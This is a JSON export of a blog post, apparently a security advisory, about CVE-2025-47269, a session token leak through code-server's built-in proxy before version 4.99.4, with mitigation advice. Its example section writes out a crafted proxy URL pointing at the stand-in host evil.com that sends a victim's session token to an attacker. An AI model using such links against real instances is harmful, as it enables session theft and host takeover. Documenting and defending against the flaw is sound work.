{"id":39251,"date":"2025-05-18T01:23:25","date_gmt":"2025-05-18T01:23:25","guid":{"rendered":""},"modified":"2025-10-01T20:23:12","modified_gmt":"2025-10-02T02:23:12","slug":"cve-2025-47269-session-token-exposure-in-code-server-prior-to-version-4-99-4","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-47269-session-token-exposure-in-code-server-prior-to-version-4-99-4\/","title":{"rendered":"<strong>CVE-2025-47269: Session Token Exposure in code-server Prior to Version 4.99.4<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>In the world of cybersecurity, the discovery and mitigation of vulnerabilities are paramount to sustaining a safe digital environment. One such vulnerability is CVE-2025-47269, affecting code-server, a popular tool that allows users to run Visual Studio Code on any machine through browser access. This vulnerability is significant due to the potential for malicious agents to access sensitive data, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-30165-potential-system-compromise-in-vllm-v0-engine\/\"  data-wpil-monitor-id=\"44007\">potentially leading to system compromise<\/a> or data leakage.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-47269<br \/>\nSeverity: High (8.3 CVSS Score)<br \/>\nAttack Vector: Network (<a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-58361-xss-vulnerability-in-promptcraft-forge-studio-via-non-exhaustive-url-scheme-check\/\"  data-wpil-monitor-id=\"87052\">via crafted URL<\/a>)<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: Required (victim needs to click on a malicious link)<br \/>\nImpact: System compromise, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-45746-unauthorized-system-access-via-hardcoded-jwt-secret-in-zkt-zkbio-cvsecurity\/\"  data-wpil-monitor-id=\"48952\">Unauthorized Access<\/a>, Data Leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-3992427384\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>code-server | Prior to 4.99.4<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-4366-request-smuggling-vulnerability-in-pingora-s-proxying-framework\/\"  data-wpil-monitor-id=\"56583\">vulnerability lies in the built-in proxy<\/a> feature of code-server. Prior to version 4.99.4, a lack of sufficient validation for proxy requests allows a <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-24189-memory-corruption-vulnerability-due-to-maliciously-crafted-web-content-in-various-operating-systems\/\"  data-wpil-monitor-id=\"56584\">maliciously crafted<\/a> URL to proxy a connection to an arbitrary domain. This URL could be structured to reference the attacker&#8217;s domain, enabling the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-46827-graylog-open-log-management-platform-user-session-cookie-exposure\/\"  data-wpil-monitor-id=\"47626\">session cookie<\/a> to be sent to the attacker&#8217;s site. With the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-47275-session-cookie-vulnerability-in-auth0-php-sdk\/\"  data-wpil-monitor-id=\"50455\">session cookie<\/a>, the attacker could log into the code-server and potentially gain full access to the host machine.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-2366508338\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Consider the following URL, which an attacker could craft and distribute:<\/p>\n<pre><code class=\"\" data-line=\"\">https:\/\/&lt;code-server&gt;\/proxy\/test@evil.com\/path<\/code><\/pre>\n<p>In this scenario, the attacker&#8217;s domain is `evil.com`. When a user clicks on this URL, their connection would be proxied to `test@evil.com\/path`, and their session token would be sent along with it. This <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-49151-unauthenticated-attackers-can-forge-json-web-tokens-in-microsens-nmp-web\/\"  data-wpil-monitor-id=\"64546\">token could then be used by the attacker<\/a> to access the user&#8217;s code-server instance.<\/p>\n<p><strong>Mitigation and Recommendations<\/strong><\/p>\n<p>The developers behind code-server have addressed this issue in version 4.99.4. It is recommended to update your code-server to this version or later. If immediate updating is not possible, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31279-critical-permission-issue-allowing-user-fingerprinting-in-macos-and-ipados\/\"  data-wpil-monitor-id=\"81920\">users can temporarily mitigate the issue<\/a> by disabling the built-in proxy feature or implementing a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to identify and block malicious requests. Always avoid clicking on links from <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-52709-high-risk-deserialization-of-untrusted-data-vulnerability-in-everest-forms\/\"  data-wpil-monitor-id=\"65277\">untrusted sources to reduce the risk<\/a> of exposure.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview In the world of cybersecurity, the discovery and mitigation of vulnerabilities are paramount to sustaining a safe digital environment. One such vulnerability is CVE-2025-47269, affecting code-server, a popular tool that allows users to run Visual Studio Code on any machine through browser access. This vulnerability is significant due to the potential for malicious agents [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-39251","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=39251"}],"version-history":[{"count":9,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251\/revisions"}],"predecessor-version":[{"id":79896,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251\/revisions\/79896"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=39251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=39251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=39251"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=39251"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=39251"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=39251"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=39251"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=39251"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=39251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}